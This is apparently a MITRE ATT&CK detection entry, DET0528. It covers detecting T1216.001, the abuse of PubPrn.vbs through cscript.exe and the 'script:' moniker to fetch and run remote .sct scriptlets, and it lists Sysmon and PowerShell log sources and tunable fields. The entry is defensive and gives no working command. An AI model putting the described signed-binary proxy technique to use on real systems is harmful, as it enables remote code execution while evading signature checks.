DET0528 Detecting Remote Script Proxy Execution via PubPrn.vbs

Item	Value
ID	DET0528
Version	1.0
Created	21 October 2025
Last Modified	21 October 2025

Technique Detected: T1216.001 (PubPrn)

Analytics

Windows

AN1464

Execution of PubPrn.vbs via cscript.exe using the ‘script:’ moniker to load and execute a remote .sct scriptlet file, bypassing signature validation and proxying remote payloads through a signed Microsoft script host.

Log Sources

Data Component	Name	Channel
Process Creation (DC0032)	WinEventLog:Sysmon	EventCode=1
Command Execution (DC0064)	WinEventLog:PowerShell	EventCode=4103, 4104, 4105, 4106
Network Connection Creation (DC0082)	WinEventLog:Sysmon	EventCode=3, 22
Module Load (DC0016)	WinEventLog:Sysmon	EventCode=7

Mutable Elements

Field	Description
CommandLineRegex	Detects ‘script:’ moniker with HTTP/HTTPS URI as argument to pubprn.vbs
ParentProcessName	May vary between cscript.exe, wscript.exe, or cmd.exe depending on execution method
NetworkDestinationDomain	Used to detect external domains being contacted for remote scriptlet execution
TimeWindow	Maximum allowed time delta between pubprn.vbs invocation and network connection or child process